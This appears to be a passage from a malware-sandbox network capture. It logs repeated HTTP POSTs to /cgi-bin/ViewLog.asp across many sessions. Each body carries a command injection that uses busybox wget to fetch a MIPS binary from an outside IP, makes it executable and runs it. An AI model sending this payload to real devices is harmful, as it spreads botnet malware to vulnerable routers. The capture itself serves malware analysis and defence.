                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.558276892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:58.566234112 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.374219894 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              462192.168.2.133684294.122.125.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:36.679573059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              463192.168.2.134490231.136.219.1728080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:36.857805014 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.446320057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.598287106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:40.902271032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.510281086 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.726226091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.182183981 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              464192.168.2.135323862.29.60.2098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:36.894273043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              465192.168.2.134522494.122.93.1658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:36.903486967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              466192.168.2.133690831.136.12.858080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.042768002 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.606268883 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.726264000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.158255100 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.766247988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.726219893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.182187080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              467192.168.2.134678061.139.119.21923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.255091906 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 33 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:30Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              468192.168.2.134054694.122.69.158080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.456335068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              469192.168.2.135815094.122.21.828080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.473140955 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              470192.168.2.133617295.216.173.2278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.845352888 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              471192.168.2.135805295.86.124.1478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.879472017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              472192.168.2.135375062.202.157.918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:37.881411076 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
